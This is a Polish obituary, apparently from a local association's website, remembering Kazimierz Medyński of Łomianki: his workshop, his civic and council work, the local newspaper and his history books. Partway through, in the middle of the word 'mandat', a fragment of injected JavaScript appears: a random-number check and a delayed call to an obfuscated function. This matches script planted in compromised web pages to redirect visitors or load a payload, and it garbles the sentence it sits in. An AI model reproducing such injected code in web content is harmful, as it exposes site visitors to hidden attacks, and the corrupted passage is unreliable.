Kazimierz Medyński (1936-2020)

Wspomnienie pośmiertne

 

Jeszcze kilka tygodni temu rozmawialiśmy o przypadającej w tym roku trzydziestej rocznicy pierwszych po wojnie wolnych wyborów samorządowych, że trzeba coś napisać, póki jeszcze pamiętamy… Bo pamięć dla Kazimierza była bardzo ważna! Cała jego aktywność w ostatnich latach była poświęcona kultywowaniu pamięci o historii Łomianek od czasów wojennych. Z tego był znany i powszechnie szanowany, ale to tylko fragment jego życiowych dokonań. Warto je przywołać, bo jest o czym pisać.

Poznałem Kazimierza w latach osiemdziesiątych ubiegłego wieku, gdy po zwolnieniu z Przemysłowego Instytutu Motoryzacji otworzył w Dąbrowie warsztat naprawy Fiata 126p. Jako właściciel tego “cudu” socjalistycznej motoryzacji byłem częstym gościem jego warsztatu i tak się zaprzyjaźniliśmy. Gdy w roku 1989 wybuchła druga Solidarność Kazimierz mocno zaangażował się w łomiankowski Komitet Obywatelski. W styczniu następnego roku pojawiła się inicjatywa zorganizowania w Łomiankach, słynących w owych czasach z bardzo licznych zakładów rzemieślniczych, powołania Stowarzyszenia Prywatnych Przedsiębiorców, Kazimierz pierwszy poparł ten pomysł i, tak jak to robił zawsze, zaangażował się całym sercem. W majowych wyborach samorządowych uzyskał mandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andat radnego. Dzisiaj pewnie niewiele osób pamięta, ale własna komunikacja autobusowa w Łomiankach to było, między innymi oczywiście, jego dzieło. Podobnie było z Gazetą Łomiankowską, którą od maja 1990 roku wydawało Stowarzyszenie Prywatnych Przedsiębiorców. Kazimierz był dobrym duchem tej gazety. Pisał dużo i dobrze. Warto w tym miejscu dodać, że była to prawdopodobnie jedna z pierwszych w Polsce gazet lokalnych.

Jego kolejnymi lokalnymi aktywnościami było działanie w Stowarzyszeniu Mieszkańców Dąbrowy Leśnej oraz w Stowarzyszeniu Nasze Łomianki, przy którego wsparciu ukazała się jego pierwsza książka “Wojenne Łomianki”. Ostatnia pozycja to “Ilustrowane Kalendarium Łomiankowskie” wydane przez Urząd Miejski. Przez ostatnie lata, mimo zaawansowanego wieku i kłopotów ze zdrowiem, pełnił funkcję prezesa łomiankowskiego Koła Kombatantów.

W  2010 roku prezydent Bronisław Komorowski odznaczył Kazimierza Medyńskiego Złotym Krzyżem Zasługi. Niewielu tak jak On zasłużyło na to wyróżnienie.

Cześć Jego Pamięci!

Andrzej Kaliński
Stowarzyszenie Nasze Łomianki

 

Jerzy Kostowski Opublikowane przez:

Bądź pierwszą osobą, która zostawi swój komentarz

Dodaj komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

Afiseaza emoticoanele Locco.Ro